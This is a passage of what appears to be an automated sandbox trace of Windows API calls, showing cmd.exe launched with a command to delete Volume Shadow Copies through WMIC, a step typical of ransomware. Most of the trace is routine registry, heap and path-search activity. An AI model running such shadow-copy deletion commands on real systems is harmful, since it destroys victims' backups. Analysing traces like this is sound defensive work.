(_Func=0x1088050) returned 0x1088050 [0136.752] _onexit (_Func=0x1088060) returned 0x1088060 [0136.752] _onexit (_Func=0x1088070) returned 0x1088070 [0136.754] _onexit (_Func=0x1088080) returned 0x1088080 [0136.754] GetCurrentThreadId () returned 0xdfc [0136.754] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdfc) returned 0xbc [0136.754] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0136.754] GetProcAddress (hModule=0x74030000, lpProcName="SetThreadUILanguage") returned 0x74044f70 [0136.754] SetThreadUILanguage (LangId=0x0) returned 0xd20409 [0137.332] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0137.332] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xf7fd28 | out: phkResult=0xf7fd28*=0x0) returned 0x2 [0137.332] VirtualQuery (in: lpAddress=0xf7fd33, lpBuffer=0xf7fce0, dwLength=0x1c | out: lpBuffer=0xf7fce0*(BaseAddress=0xf7f000, AllocationBase=0xe80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0137.332] VirtualQuery (in: lpAddress=0xe80000, lpBuffer=0xf7fce0, dwLength=0x1c | out: lpBuffer=0xf7fce0*(BaseAddress=0xe80000, AllocationBase=0xe80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0137.332] VirtualQuery (in: lpAddress=0xe81000, lpBuffer=0xf7fce0, dwLength=0x1c | out: lpBuffer=0xf7fce0*(BaseAddress=0xe81000, AllocationBase=0xe80000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0137.332] VirtualQuery (in: lpAddress=0xe83000, lpBuffer=0xf7fce0, dwLength=0x1c | out: lpBuffer=0xf7fce0*(BaseAddress=0xe83000, AllocationBase=0xe80000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0137.332] VirtualQuery (in: lpAddress=0xf80000, lpBuffer=0xf7fce0, dwLength=0x1c | out: lpBuffer=0xf7fce0*(BaseAddress=0xf80000, AllocationBase=0xf80000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0137.332] GetConsoleOutputCP () returned 0x1b5 [0138.251] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a3850 | out: lpCPInfo=0x10a3850) returned 1 [0138.252] SetConsoleCtrlHandler (HandlerRoutine=0x1097260, Add=1) returned 1 [0138.268] _get_osfhandle (_FileHandle=1) returned 0x90 [0138.268] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x10a388c | out: lpMode=0x10a388c) returned 1 [0139.495] _get_osfhandle (_FileHandle=0) returned 0x8c [0139.495] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0x10a3888 | out: lpMode=0x10a3888) returned 1 [0140.712] _get_osfhandle (_FileHandle=1) returned 0x90 [0140.712] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0141.520] _get_osfhandle (_FileHandle=1) returned 0x90 [0141.520] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x10a3890 | out: lpMode=0x10a3890) returned 1 [0142.432] _get_osfhandle (_FileHandle=1) returned 0x90 [0142.432] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0143.111] _get_osfhandle (_FileHandle=0) returned 0x8c [0143.111] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0x10a3894 | out: lpMode=0x10a3894) returned 1 [0144.033] _get_osfhandle (_FileHandle=0) returned 0x8c [0144.033] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0144.470] GetEnvironmentStringsW () returned 0x3114b58* [0144.470] GetProcessHeap () returned 0x3110000 [0144.470] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xaca) returned 0x3115630 [0144.471] FreeEnvironmentStringsA (penv="A") returned 1 [0144.471] GetProcessHeap () returned 0x3110000 [0144.471] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x4) returned 0x3114638 [0144.471] GetEnvironmentStringsW () returned 0x3114b58* [0144.471] GetProcessHeap () returned 0x3110000 [0144.471] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xaca) returned 0x3116108 [0144.471] FreeEnvironmentStringsA (penv="A") returned 1 [0144.471] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf7ec84 | out: phkResult=0xf7ec84*=0xcc) returned 0x0 [0144.471] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x0, lpData=0xf7ec90*=0xa0, lpcbData=0xf7ec88*=0x1000) returned 0x2 [0144.471] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x4, lpData=0xf7ec90*=0x1, lpcbData=0xf7ec88*=0x4) returned 0x0 [0144.471] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x0, lpData=0xf7ec90*=0x1, lpcbData=0xf7ec88*=0x1000) returned 0x2 [0144.471] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x4, lpData=0xf7ec90*=0x0, lpcbData=0xf7ec88*=0x4) returned 0x0 [0144.471] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x4, lpData=0xf7ec90*=0x40, lpcbData=0xf7ec88*=0x4) returned 0x0 [0144.471] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x4, lpData=0xf7ec90*=0x40, lpcbData=0xf7ec88*=0x4) returned 0x0 [0144.471] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x0, lpData=0xf7ec90*=0x40, lpcbData=0xf7ec88*=0x1000) returned 0x2 [0144.471] RegCloseKey (hKey=0xcc) returned 0x0 [0144.471] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf7ec84 | out: phkResult=0xf7ec84*=0xcc) returned 0x0 [0144.472] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x0, lpData=0xf7ec90*=0x40, lpcbData=0xf7ec88*=0x1000) returned 0x2 [0144.472] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x4, lpData=0xf7ec90*=0x1, lpcbData=0xf7ec88*=0x4) returned 0x0 [0144.472] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x0, lpData=0xf7ec90*=0x1, lpcbData=0xf7ec88*=0x1000) returned 0x2 [0144.472] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x4, lpData=0xf7ec90*=0x0, lpcbData=0xf7ec88*=0x4) returned 0x0 [0144.472] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x4, lpData=0xf7ec90*=0x9, lpcbData=0xf7ec88*=0x4) returned 0x0 [0144.472] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x4, lpData=0xf7ec90*=0x9, lpcbData=0xf7ec88*=0x4) returned 0x0 [0144.472] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf7ec8c, lpData=0xf7ec90, lpcbData=0xf7ec88*=0x1000 | out: lpType=0xf7ec8c*=0x0, lpData=0xf7ec90*=0x9, lpcbData=0xf7ec88*=0x1000) returned 0x2 [0144.472] RegCloseKey (hKey=0xcc) returned 0x0 [0144.472] time (in: timer=0x0 | out: timer=0x0) returned 0x5e338ec1 [0144.472] srand (_Seed=0x5e338ec1) [0144.472] GetCommandLineW () returned="cmd /c \"WMIC.exe shadowcopy delet\"" [0144.472] malloc (_Size=0x4000) returned 0x35921f0 [0144.473] GetCommandLineW () returned="cmd /c \"WMIC.exe shadowcopy delet\"" [0144.473] malloc (_Size=0xffce) returned 0x3410048 [0144.473] ??_V@YAXPAX@Z () returned 0xf7fc68 [0144.473] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3410048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0144.474] malloc (_Size=0xffce) returned 0x3420020 [0144.475] ??_V@YAXPAX@Z () returned 0xf7fa3c [0144.475] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3420020, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0144.475] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x109f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0144.475] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x109f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.475] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x109f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.475] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0144.475] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0144.475] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0144.475] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0144.475] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0144.475] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0144.475] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0144.475] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0144.475] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0144.476] GetProcessHeap () returned 0x3110000 [0144.476] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x3115630) returned 1 [0144.476] GetEnvironmentStringsW () returned 0x3114b58* [0144.476] GetProcessHeap () returned 0x3110000 [0144.476] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xae2) returned 0x31176d0 [0144.476] FreeEnvironmentStringsA (penv="A") returned 1 [0144.476] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x109f840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0144.476] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x109f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.476] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0144.476] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0144.476] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0144.476] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0144.476] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0144.476] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0144.476] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0144.476] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0144.476] malloc (_Size=0xffce) returned 0x342fff8 [0144.476] ??_V@YAXPAX@Z () returned 0xf7f7d4 [0144.477] GetProcessHeap () returned 0x3110000 [0144.477] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x38) returned 0x3110ae0 [0144.477] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x342fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0144.477] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x342fff8, lpFilePart=0xf7f820 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xf7f820*="Desktop") returned 0x17 [0144.477] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0144.478] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xf7f5a0 | out: lpFindFileData=0xf7f5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xe235621a, ftLastAccessTime.dwHighDateTime=0x1d5d7dc, ftLastWriteTime.dwLowDateTime=0xe235621a, ftLastWriteTime.dwHighDateTime=0x1d5d7dc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3110b20 [0144.478] FindClose (in: hFindFile=0x3110b20 | out: hFindFile=0x3110b20) returned 1 [0144.478] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xf7f5a0 | out: lpFindFileData=0xf7f5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x3110b20 [0144.478] FindClose (in: hFindFile=0x3110b20 | out: hFindFile=0x3110b20) returned 1 [0144.478] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xf7f5a0 | out: lpFindFileData=0xf7f5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdb3454b3, ftLastAccessTime.dwHighDateTime=0x1d5d7dc, ftLastWriteTime.dwLowDateTime=0xdb3454b3, ftLastWriteTime.dwHighDateTime=0x1d5d7dc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3110b20 [0144.478] FindClose (in: hFindFile=0x3110b20 | out: hFindFile=0x3110b20) returned 1 [0144.478] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0144.478] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0144.478] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0144.478] GetProcessHeap () returned 0x3110000 [0144.478] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x31176d0) returned 1 [0144.478] GetEnvironmentStringsW () returned 0x3114b58* [0144.478] GetProcessHeap () returned 0x3110000 [0144.479] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xb1a) returned 0x3116be0 [0144.479] FreeEnvironmentStringsA (penv="=") returned 1 [0144.479] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3410048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0144.479] GetProcessHeap () returned 0x3110000 [0144.479] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x3110ae0) returned 1 [0144.479] ??_V@YAXPAX@Z () returned 0x1 [0144.479] ??_V@YAXPAX@Z () returned 0x1 [0144.479] GetProcessHeap () returned 0x3110000 [0144.479] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x400e) returned 0x3118ce8 [0144.479] GetProcessHeap () returned 0x3110000 [0144.479] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x44) returned 0x3117708 [0144.479] GetProcessHeap () returned 0x3110000 [0144.479] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x4008) returned 0x311cd00 [0144.480] GetProcessHeap () returned 0x3110000 [0144.480] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x4008) returned 0x3120d10 [0144.481] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0144.481] malloc (_Size=0xffce) returned 0x3420020 [0144.481] ??_V@YAXPAX@Z () returned 0xf7f984 [0144.481] GetProcessHeap () returned 0x3110000 [0144.481] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x1ffa4) returned 0x3124d20 [0144.483] SetErrorMode (uMode=0x0) returned 0x8001 [0144.483] SetErrorMode (uMode=0x1) returned 0x0 [0144.483] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x3124d28, lpFilePart=0xf7f9a4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xf7f9a4*="Desktop") returned 0x17 [0144.483] SetErrorMode (uMode=0x8001) returned 0x1 [0144.483] GetProcessHeap () returned 0x3110000 [0144.483] RtlReAllocateHeap (Heap=0x3110000, Flags=0x0, Ptr=0x3124d20, Size=0x6c) returned 0x3124d20 [0144.483] GetProcessHeap () returned 0x3110000 [0144.483] RtlSizeHeap (HeapHandle=0x3110000, Flags=0x0, MemoryPointer=0x3124d20) returned 0x6c [0144.483] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x109f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0144.484] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0144.485] GetProcessHeap () returned 0x3110000 [0144.485] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x1b4) returned 0x3117758 [0144.485] GetProcessHeap () returned 0x3110000 [0144.485] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x360) returned 0x3117918 [0144.493] GetProcessHeap () returned 0x3110000 [0144.493] RtlReAllocateHeap (Heap=0x3110000, Flags=0x0, Ptr=0x3117918, Size=0x1b6) returned 0x3117918 [0144.493] GetProcessHeap () returned 0x3110000 [0144.493] RtlSizeHeap (HeapHandle=0x3110000, Flags=0x0, MemoryPointer=0x3117918) returned 0x1b6 [0144.494] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x109f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.494] GetProcessHeap () returned 0x3110000 [0144.494] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xe0) returned 0x3117ad8 [0144.495] GetProcessHeap () returned 0x3110000 [0144.495] RtlReAllocateHeap (Heap=0x3110000, Flags=0x0, Ptr=0x3117ad8, Size=0x76) returned 0x3117ad8 [0144.495] GetProcessHeap () returned 0x3110000 [0144.495] RtlSizeHeap (HeapHandle=0x3110000, Flags=0x0, MemoryPointer=0x3117ad8) returned 0x76 [0144.495] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.495] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WMIC.exe shadowcopy delet", fInfoLevelId=0x1, lpFindFileData=0xf7f750, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f750) returned 0xffffffff [0144.495] GetLastError () returned 0x2 [0144.496] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WMIC.exe shadowcopy delet.*", fInfoLevelId=0x1, lpFindFileData=0xf7f730, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f730) returned 0xffffffff [0144.496] GetLastError () returned 0x2 [0144.496] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.496] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.exe shadowcopy delet", fInfoLevelId=0x1, lpFindFileData=0xf7f750, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f750) returned 0xffffffff [0144.496] GetLastError () returned 0x2 [0144.496] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.exe shadowcopy delet.*", fInfoLevelId=0x1, lpFindFileData=0xf7f730, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f730) returned 0xffffffff [0144.496] GetLastError () returned 0x2 [0144.496] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.496] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\WMIC.exe shadowcopy delet", fInfoLevelId=0x1, lpFindFileData=0xf7f750, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f750) returned 0xffffffff [0144.496] GetLastError () returned 0x2 [0144.497] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\WMIC.exe shadowcopy delet.*", fInfoLevelId=0x1, lpFindFileData=0xf7f730, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f730) returned 0xffffffff [0144.497] GetLastError () returned 0x2 [0144.497] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.497] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\WMIC.exe shadowcopy delet", fInfoLevelId=0x1, lpFindFileData=0xf7f750, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f750) returned 0xffffffff [0144.497] GetLastError () returned 0x2 [0144.497] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\WMIC.exe shadowcopy delet.*", fInfoLevelId=0x1, lpFindFileData=0xf7f730, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f730) returned 0xffffffff [0144.497] GetLastError () returned 0x2 [0144.497] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.497] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe shadowcopy delet", fInfoLevelId=0x1, lpFindFileData=0xf7f750, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f750) returned 0xffffffff [0144.498] GetLastError () returned 0x2 [0144.498] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe shadowcopy delet.*", fInfoLevelId=0x1, lpFindFileData=0xf7f730, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f730) returned 0xffffffff [0144.499] GetLastError () returned 0x2 [0144.500] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.500] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\WMIC.exe shadowcopy delet", fInfoLevelId=0x1, lpFindFileData=0xf7f750, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f750) returned 0xffffffff [0144.500] GetLastError () returned 0x2 [0144.500] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\WMIC.exe shadowcopy delet.*", fInfoLevelId=0x1, lpFindFileData=0xf7f730, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f730) returned 0xffffffff [0144.502] GetLastError () returned 0x2 [0144.502] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.502] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\WMIC.exe shadowcopy delet", fInfoLevelId=0x1, lpFindFileData=0xf7f750, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f750) returned 0xffffffff [0144.502] GetLastError () returned 0x2 [0144.502] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\WMIC.exe shadowcopy delet.*", fInfoLevelId=0x1, lpFindFileData=0xf7f730, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f730) returned 0xffffffff [0144.502] GetLastError () returned 0x2 [0144.502] ??_V@YAXPAX@Z () returned 0x1 [0144.502] GetProcessHeap () returned 0x3110000 [0144.502] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x311cd00) returned 1 [0144.503] GetProcessHeap () returned 0x3110000 [0144.503] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x3120d10) returned 1 [0144.503] GetProcessHeap () returned 0x3110000 [0144.504] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x3118ce8) returned 1 [0144.504] GetConsoleOutputCP () returned 0x1b5 [0144.946] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a3850 | out: lpCPInfo=0x10a3850) returned 1 [0144.947] GetUserDefaultLCID () returned 0x409 [0144.947] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x109f82c, cchData=8 | out: lpLCData=":") returned 2 [0144.947] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xf7fb90, cchData=128 | out: lpLCData="0") returned 2 [0144.947] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xf7fb90, cchData=128 | out: lpLCData="0") returned 2 [0144.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xf7fb90, cchData=128 | out: lpLCData="1") returned 2 [0144.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x109f81c, cchData=8 | out: lpLCData="/") returned 2 [0144.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x109f7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0144.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x109f778, cchData=32 | out: lpLCData="Tue") returned 4 [0144.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x109f738, cchData=32 | out: lpLCData="Wed") returned 4 [0144.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x109f6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0144.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x109f6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0144.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x109f678, cchData=32 | out: lpLCData="Sat") returned 4 [0144.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x109f638, cchData=32 | out: lpLCData="Sun") returned 4 [0144.948] GetLocaleInfoW (in: Locale=0x409, 